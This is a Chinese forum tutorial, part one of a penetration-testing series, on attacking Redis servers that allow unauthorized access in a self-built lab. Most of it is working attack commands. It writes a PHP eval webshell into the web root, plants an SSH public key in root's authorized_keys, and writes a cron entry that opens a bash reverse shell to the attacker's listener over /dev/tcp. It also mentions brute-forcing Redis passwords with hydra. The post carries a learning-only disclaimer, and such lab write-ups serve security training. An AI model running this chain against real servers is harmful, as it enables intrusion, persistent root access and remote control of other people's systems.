渗透测试之地基服务篇：服务攻防之数据库Redis（上）

zhaorong · 发表于网络安全 2021-9-9 16:09:43


	本帖最后由 zhaorong 于 2021-9-9 16:21 编辑简介渗透测试-地基篇该篇章目的是重新牢固地基加强每日训练操作的笔记在记录地基笔记中会有很多跳跃性思维的操作和方式方法望大家能共同加油学到东西。请注意：本文仅用于技术讨论与研究对于所有笔记中复现的这些终端或者服务器都是自行搭建的环境进行渗透的我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的如果列出的技术用于其他任何目标，本站及作者概不负责。一、前言数据库作为业务平台信息技术的核心和基础承载着越来越多的关键数据渐渐成为单位公共安全中最具有战略性的资产数据库的安全稳定运行也直接决定着业务系统能否正常使用。并且平台的数据库中往往储存着等极其重要和敏感的信息这些信息一旦被篡改或者泄露轻则造成企业经济损失，重则影响企业形象，甚至行业、社会安全。可见数据库安全至关重要。所以对数据库的保护是一项必须的关键的重要的工作任务。通过前几期钓鱼内网攻防篇章落幕后引来了服务攻防篇章之数据库渗透篇不管在外网还是内网环境只要存在业务系统都存在数据库，在渗透测试对数据库的知识学习是必不可少的，接下来将介绍数据库的渗透基本操作带小伙伴们了解和学习数据库如何渗透的！今天会讲解到Redis环境安装 Redis未授权访问 redis写webshell redis 密钥登录ssh 利用计划任务反弹shell等操作，如果连Redis都不会安装操作提权等怎么进行下一步的研究Redis数据库安全！怎么拿下对方服务器？二、Redis简介 REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。 Redis是一个开源的使用ANSI C语言编写遵守BSD协议支持网络可基于内存亦可持久化的日志型 Key-Value数据库并提供多种语言的API。它通常被称为数据结构服务器因为值（value）可以是字符串String 哈希(Map), 列表list集合 sets) 和有序集合(sorted sets)等类型。从2010年3月15日起 Redis的开发工作由VMware主持。从2013年5月开始 Redis的开发由Pivotal赞助。目前最新稳定版本为4.0.8。 Redis 是一个开源的高性能键值数据库。最热门的 NoSql 数据库之一也被人们称为数据结构服务器。它最突出的特点就是：快 1. 以内存作为数据存储介质读写数据的效率极高。 2. 跟 memcache 不同的是储存在 Redis 中的数据是持久化的断电或重启数据也不会丢失。 3. 存储分为内存存储磁盘存储和 log 文件。 4. 可以从磁盘重新将数据加载到内存中也可以通过配置文件对其进行配置因此 redis 才能实现持久化。 5. 支持主从模式可以配置集群更利于支撑大型的项目。 1、Redis默认端口 Redis默认配置端口为6379 sentinel.conf配置器端口为26379 2、官方站点 https://redis.io/ http://download.redis.io/releases/redis-3.2.11.tar.gz 4.x安装： wget http://download.redis.io/releases/redis-4.0.8.tar.gz tar -zxvf redis-4.0.8.tar.gz cd redis-4.0.8 make 复制代码最新版本前期漏洞已经修复测试时建议安装3.2.11版本。以下实验使用3.2版本复现！！三、Redis环境安装 1、定义 Redis是一个C语言编写的基于key-value类型的高效数据库。 Redis可以执行一些操作将数据保存到内存之中（这也是为什么效率这么高的原因）。同时redis也可以将内存中的数据写入磁盘之中。 2、未授权访问原因主要是因为配置不当导致未授权访问漏洞。进一步将恶意数据写入内存或者磁盘之中造成更大的危害。配置不当一般主要是两个原理：（1）配置登录策略导致任意机器都可以登录redis。（2）未设置密码或者设置弱口令。 3、 redis服务的搭建 wget http://download.redis.io/releases/redis-3.2.0.tar.gz tar xzf redis-3.2.0.tar.gz cd redis-3.2.0 make 复制代码下载redis的压缩包文件解压缩，切换目录到解压后的redis，进行编译。 4、修改配置文件redis.conf （1）cp redis.conf ./src/redis.conf （2）bind 127.0.0.1前面加上#号注释掉注释这行语句，代表任意机器都可以登录redis （3）protected-mode设为no 这只为NO，代表关闭安全设置（4）启动redis-server ./src/redis-server redis.conf 复制代码安装成功后如图所示。默认的配置是使用6379端口没有密码。这时候会导致未授权访问然后使用redis权限写文件。 5、zsh需要添加环境变量： export PATH=/root/Desktop/redis-3.2.0/src:$PATH 复制代码 6、检查服务已开启6379！四、Redis未授权访问 Redis在大公司被大量应用通过笔者的研究发现目前在互联网上已经出现Redis未经授权病毒似自动攻击攻击成功后会对内网进行扫描控制感染以及用来进行挖矿勒索等恶意行为早期网上曾经分析过一篇文章通过redis感染linux版本勒索病毒的服务器”（http://www.sohu.com/a/143409075_765820）如果公司使用了Redis那么应当给予重视通过实际研究当在一定条件下攻击者可以获取webshell 甚至root权限。 1、连接Redis服务器（1）交互式方式 redis-cli -h {host} -p {port} 复制代码方式连接然后所有的操作都是在交互的方式实现不需要再执行redis-cli了例如命令： redis-cli -h 127.0.0.1-p 6379，加-a参数表示带密码的访问。（2）命令方式 redis-cli -h {host} -p {port} {command} 复制代码直接得到命令的返回结果（3）常见命令 1. 查看信息：info 2. 删除所有数据库内容：flushall 3. 刷新数据库：flushdb 4. 看所有键：KEYS ，使用select num可以查看键值数据。 5. 设置变量：set test “who am i” 6. config set dir dirpath 设置路径等配置 7. config get dir/dbfilename 获取路径及数据配置信息 8. save保存 9. get 变量，查看变量名称复制代码* 2、使用攻击机器测试是否存在未授权 redis-cli -h 192.168.253.9 info 复制代码 3、不存在未授权情况 1. bind 127.0.0.1 未注释，仅仅允许本地访问，攻击机kali无法连接。 2. 设置了密码（爆破redis的密码（hydra））复制代码五、redis写webshell 1、写入webshell 命令： config set dir /var/www/html/ //切换目录到网站的根目录 set x "\n\n\n<?php phpinfo();?>\n\n\n" //写入恶意代码到内存中(1) set xx "\n\n\n<?php @eval($_POST[‘dayu’]);?>\n\n\n" //写入恶意代码到内存中(2) config set dbfilename shell.php //在磁盘中生成木马文件 save //将内存之中的数据导出到磁盘文件复制代码强调：执行命令顺序可以打乱！成功通过未授权写入webshel 2、检查webshell 1）kali开启apache 在终端输入vim /etc/apache2/ports.conf” -> 键盘输入i 进入插入编辑模式 -> 修改apache2默认监听端口号为8080 -> 编辑好后，按Esc键+“：wq” 保存退出 -> 在终端输入“/etc/init.d/apache2 start” http://192.168.253.9:8080/shell.php 复制代码正常蚁剑链接webshell!! 六、redis 密钥登录ssh 1、kali开启ssh服务 /etc/init.d/ssh start 复制代码 2、修改redis密码 config set requirepass dayu123 登录： redis-cli -h 192.168.253.9 -a dayu123 复制代码 3、生成ssh-rsa密匙 ssh-keygen -t rsa 复制代码 4、写入ssh密匙 1）导出key（\n\n是为了防止乱码）。 (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt 复制代码 2）将生成的公钥写入redis服务器的内存之中 cat key.txt \| redis-cli -h 192.168.253.9 -a dayu123 -x set xxx [align=center] [/align] [align=center] [/align] 成功写入！！ 3）设置路径准备导出文件到磁盘本质是更改redis的备份路径 [align=center] [/align] [code]config set dir /root/.ssh 复制代码注意：假如这个“ /root/.ssh ”不存在的话这里会显示失败的就不会返回ok了。 4）设置文件名（不能改成其他的）并导出 config set dbfilename authorized_keys save 复制代码成功导入！！！ 5）登录ssh 成功登录！！七、利用计划任务反弹shell 1、攻击端开启监听 nc -vlp 6666 复制代码 2、写入一句话 set xx "\n* * * * * bash -i >& /dev/tcp/192.168.253.9/6666 0>&1\n" //上边的星号代表的是计划任务的时间 config set dir /var/spool/cron/ //设置导出的路径 config set dbfilename root //设置导出文件名为“ root ” save //保存复制代码或者： echo -e "\n\n/1 * * * /bin/bash -i >& /dev/tcp/192.168.253.9/6666 0>&1\n\n"\|red is-cli -h 192.168.253.12 -x set 1 redis-cli -h 192.168.253.12 config set dir /var/spool/cron/ redis-cli -h 192.168.253.12 config set dbfilename root redis-cli -h 192.168.253.12 save 复制代码经过测试，centos成功！八、总结今天学到了Redis环境安装 Redis未授权访问 redis写webshell redis 密钥登录ssh 利用计划任务反弹shell等操作渗透的方式方法学到了非常多的小技巧和干货希望小伙伴能实际操作复现一遍！

微信扫一扫 分享朋友圈

渗透测试之地基服务篇：服务攻防之数据库Redis（上）

微信扫一扫分享朋友圈